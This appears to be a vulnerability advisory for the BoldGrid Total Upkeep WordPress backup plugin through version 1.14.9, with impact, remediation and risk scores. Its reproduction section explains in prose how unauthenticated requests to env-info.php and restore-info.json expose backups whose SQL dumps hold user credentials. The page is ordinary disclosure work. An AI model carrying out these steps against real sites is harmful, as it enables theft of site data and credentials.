Volerion logoVolerion
Volerion logoVolerion

BoldGrid Total Upkeep WordPress Plugin Sensitive Information Exposure Vulnerability

Vulnerability

A vulnerability allowing sensitive information exposure has been identified in the Total Upkeep WordPress Backup Plugin by BoldGrid, affecting all versions through 1.14.9. The issue arises from the plugin's env-info.php and restore-info.json files, which do not properly restrict access. This flaw enables unauthenticated attackers to locate and download backup files.

Impact

Exploitation of this vulnerability allows for unauthorized access to backup files, which could contain sensitive data.

Reproduction

The vulnerability can be reproduced by sending a request to the env-info.php file to obtain server information, followed by a request to the restore-info.json file to retrieve the last backup file. Once the backup file is obtained, it can be downloaded and, if it contains an SQL file, parsed for sensitive information such as WordPress user credentials.

Remediation

Users are advised to update the Total Upkeep WordPress Backup Plugin by BoldGrid to version 1.14.10 or later.

Added: Sep 1, 2025, 7:22 PM
Updated: Sep 1, 2025, 7:22 PM

Vulnerability Rating

Custom Algorithm
spread
5.2
impact
0.6
exploitability
9.7
remediation
7.7
relevance
0.2
threat
7.8
urgency
2.9
incentive
10.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.